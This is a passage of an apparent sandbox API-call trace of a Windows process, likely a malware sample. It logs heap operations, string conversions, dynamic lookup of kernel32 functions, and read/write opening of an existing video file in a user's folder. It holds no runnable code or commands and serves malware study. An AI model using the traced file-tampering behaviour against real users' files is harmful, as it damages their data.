HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0043.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", cchWideChar=68, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 68 [0043.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", cchWideChar=68, lpMultiByteStr=0x88e138, cbMultiByte=68, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpUsedDefaultChar=0x0) returned 68 [0043.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.563] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\mb6 kn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0043.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x88) returned 0x7bbc00 [0043.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=68, lpWideCharStr=0x7bbc00, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi") returned 68 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0043.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.565] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.566] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0043.567] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.567] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0043.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.568] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8897d8 [0043.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8897d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.568] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.569] CloseHandle (hObject=0x128) returned 1 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.569] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0043.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.570] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0043.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 